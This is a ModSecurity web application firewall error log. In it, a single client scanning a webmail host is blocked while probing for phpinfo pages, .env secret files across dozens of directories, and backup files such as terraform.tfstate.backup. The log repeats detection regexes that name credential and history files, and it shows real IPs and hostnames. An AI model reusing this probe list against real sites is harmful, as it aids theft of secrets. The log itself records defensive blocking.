[Tue May 26 13:30:19.282191 2026] [security2:error] [pid 512344:tid 512494] [client 45.148.10.95:19552] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/php_info.php"] [unique_id "ahVTE8bElyei4S77DQcGzAAAABQ"]
[Tue May 26 13:30:19.282827 2026] [security2:error] [pid 512745:tid 512962] [client 45.148.10.95:19486] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/php.php"] [unique_id "ahVTE3KSB_s2CvZg7xNt6gAAAWE"]
[Tue May 26 13:30:19.294115 2026] [security2:error] [pid 512745:tid 512978] [client 45.148.10.95:19362] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/phpinfo.php"] [unique_id "ahVTE3KSB_s2CvZg7xNt6wAAAXE"]
[Tue May 26 13:30:19.300235 2026] [security2:error] [pid 512344:tid 512477] [client 45.148.10.95:19548] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/php-info.php"] [unique_id "ahVTE8bElyei4S77DQcGzQAAAAM"]
[Tue May 26 13:30:19.320127 2026] [security2:error] [pid 512745:tid 512899] [client 45.148.10.95:19468] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/portal/.env"] [unique_id "ahVTE3KSB_s2CvZg7xNt7gAAASI"]
[Tue May 26 13:30:19.348953 2026] [security2:error] [pid 512745:tid 512904] [client 45.148.10.95:19452] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/prod/.env"] [unique_id "ahVTE3KSB_s2CvZg7xNt8AAAASc"]
[Tue May 26 13:30:19.377946 2026] [security2:error] [pid 512344:tid 512576] [client 45.148.10.95:19582] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/product/.env"] [unique_id "ahVTE8bElyei4S77DQcG0wAAAGY"]
[Tue May 26 13:30:19.379455 2026] [security2:error] [pid 512745:tid 512915] [client 45.148.10.95:19522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/production/.env"] [unique_id "ahVTE3KSB_s2CvZg7xNt8gAAATI"]
[Tue May 26 13:30:19.393926 2026] [security2:error] [pid 512344:tid 512572] [client 45.148.10.95:19544] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/project/.env"] [unique_id "ahVTE8bElyei4S77DQcG1QAAAGI"]
[Tue May 26 13:30:19.458713 2026] [security2:error] [pid 512745:tid 512982] [client 45.148.10.95:19516] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/public-api/.env"] [unique_id "ahVTE3KSB_s2CvZg7xNt8wAAAXU"]
[Tue May 26 13:30:19.466844 2026] [security2:error] [pid 512745:tid 512968] [client 45.148.10.95:19468] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/public/phpinfo.php"] [unique_id "ahVTE3KSB_s2CvZg7xNt9QAAAWc"]
[Tue May 26 13:30:19.467366 2026] [security2:error] [pid 512745:tid 513002] [client 45.148.10.95:19504] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/public/.env"] [unique_id "ahVTE3KSB_s2CvZg7xNt9AAAAYk"]
[Tue May 26 13:30:19.494714 2026] [security2:error] [pid 512745:tid 512921] [client 45.148.10.95:19452] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/public_html/.env"] [unique_id "ahVTE3KSB_s2CvZg7xNt9wAAATg"]
[Tue May 26 13:30:19.521054 2026] [security2:error] [pid 512344:tid 512567] [client 45.148.10.95:19394] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/qa/.env"] [unique_id "ahVTE8bElyei4S77DQcG3gAAAF0"]
[Tue May 26 13:30:19.836580 2026] [security2:error] [pid 512344:tid 512530] [client 45.148.10.95:19394] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/s3/.env.bak"] [unique_id "ahVTE8bElyei4S77DQcG9QAAADg"]
[Tue May 26 13:30:19.838418 2026] [security2:error] [pid 512745:tid 512941] [client 46.151.24.148:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVTE3KSB_s2CvZg7xNuCQAAAUw"], referer: https://www.anujtradingco.com/
[Tue May 26 13:30:19.929469 2026] [security2:error] [pid 512745:tid 512983] [client 45.148.10.95:19504] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/server/api/.env"] [unique_id "ahVTE3KSB_s2CvZg7xNuEQAAAXY"]
[Tue May 26 13:30:19.937402 2026] [security2:error] [pid 512745:tid 512901] [client 45.148.10.95:19516] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/server/.env"] [unique_id "ahVTE3KSB_s2CvZg7xNuEgAAASQ"]
[Tue May 26 13:30:19.955934 2026] [security2:error] [pid 512745:tid 512996] [client 45.148.10.95:19546] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/server/backend/.env"] [unique_id "ahVTE3KSB_s2CvZg7xNuEwAAAYM"]
[Tue May 26 13:30:20.074749 2026] [security2:error] [pid 512344:tid 512515] [client 45.148.10.95:5128] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/service/.env"] [unique_id "ahVTFMbElyei4S77DQcHBAAAACk"]
[Tue May 26 13:30:20.080867 2026] [security2:error] [pid 512344:tid 512509] [client 45.148.10.95:19494] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/services/.env"] [unique_id "ahVTFMbElyei4S77DQcHBgAAACM"]
[Tue May 26 13:30:20.151209 2026] [security2:error] [pid 512344:tid 512505] [client 45.148.10.95:19394] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/shared/.env"] [unique_id "ahVTFMbElyei4S77DQcHCQAAAB8"]
[Tue May 26 13:30:20.186963 2026] [security2:error] [pid 512745:tid 512905] [client 45.148.10.95:5250] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/shop/.env"] [unique_id "ahVTFHKSB_s2CvZg7xNuIwAAASg"]
[Tue May 26 13:30:20.213360 2026] [security2:error] [pid 512745:tid 512987] [client 45.148.10.95:5132] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/src/.env"] [unique_id "ahVTFHKSB_s2CvZg7xNuJgAAAXo"]
[Tue May 26 13:30:20.352289 2026] [security2:error] [pid 512745:tid 512932] [client 45.148.10.95:19350] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/srv/.env"] [unique_id "ahVTFHKSB_s2CvZg7xNuLAAAAUM"]
[Tue May 26 13:30:20.358987 2026] [security2:error] [pid 512344:tid 512500] [client 45.148.10.95:19538] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/stage/.env"] [unique_id "ahVTFMbElyei4S77DQcHFQAAABo"]
[Tue May 26 13:30:20.366200 2026] [security2:error] [pid 512745:tid 512992] [client 45.148.10.95:5126] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/staging/.env"] [unique_id "ahVTFHKSB_s2CvZg7xNuLgAAAX8"]
[Tue May 26 13:30:20.406907 2026] [security2:error] [pid 512344:tid 512559] [client 45.148.10.95:19494] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/stg/.env"] [unique_id "ahVTFMbElyei4S77DQcHGAAAAFU"]
[Tue May 26 13:30:20.509534 2026] [security2:error] [pid 512344:tid 512571] [client 45.148.10.95:19538] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/stripe/.env"] [unique_id "ahVTFMbElyei4S77DQcHHAAAAGE"]
[Tue May 26 13:30:20.560970 2026] [security2:error] [pid 512344:tid 512533] [client 45.148.10.95:19494] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/terraform.tfstate.backup"] [unique_id "ahVTFMbElyei4S77DQcHHwAAADs"]
[Tue May 26 13:30:20.599646 2026] [security2:error] [pid 512745:tid 512930] [client 45.148.10.95:19516] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/test.php"] [unique_id "ahVTFHKSB_s2CvZg7xNuQQAAAUE"]
[Tue May 26 13:30:20.614062 2026] [security2:error] [pid 512745:tid 512997] [client 45.148.10.95:19452] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/test/.env"] [unique_id "ahVTFHKSB_s2CvZg7xNuRQAAAYQ"]
[Tue May 26 13:30:20.657394 2026] [security2:error] [pid 512344:tid 512503] [client 45.148.10.95:19538] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/user/.env"] [unique_id "ahVTFMbElyei4S77DQcHKAAAAB0"]
[Tue May 26 13:30:20.674569 2026] [security2:error] [pid 512745:tid 512978] [client 45.148.10.95:19350] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/v1/.env"] [unique_id "ahVTFHKSB_s2CvZg7xNuRwAAAXE"]
[Tue May 26 13:30:20.691291 2026] [security2:error] [pid 512745:tid 513001] [client 45.148.10.95:5132] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/v2/.env"] [unique_id "ahVTFHKSB_s2CvZg7xNuSAAAAYg"]
[Tue May 26 13:30:20.702024 2026] [security2:error] [pid 512745:tid 512902] [client 45.148.10.95:5126] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/v3/.env"] [unique_id "ahVTFHKSB_s2CvZg7xNuSgAAASU"]
[Tue May 26 13:30:20.710580 2026] [security2:error] [pid 512745:tid 512943] [client 46.151.24.148:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVTFHKSB_s2CvZg7xNuRgAAAU4"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1429949&moderation-hash=fcb1dce921150397d62e7b7a24e37920
[Tue May 26 13:30:20.876060 2026] [security2:error] [pid 512344:tid 512599] [client 45.148.10.95:19494] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/var/www/.env"] [unique_id "ahVTFMbElyei4S77DQcHMwAAAH0"]
[Tue May 26 13:30:20.876920 2026] [security2:error] [pid 512745:tid 512894] [client 45.148.10.95:19504] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/var/www/html/.env"] [unique_id "ahVTFHKSB_s2CvZg7xNuVgAAAR0"]
[Tue May 26 13:30:20.900519 2026] [security2:error] [pid 512745:tid 512921] [client 45.148.10.95:19546] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/web/.env"] [unique_id "ahVTFHKSB_s2CvZg7xNuVwAAATg"]
[Tue May 26 13:30:21.021308 2026] [security2:error] [pid 512745:tid 512884] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTFHKSB_s2CvZg7xNuPQAAARM"]
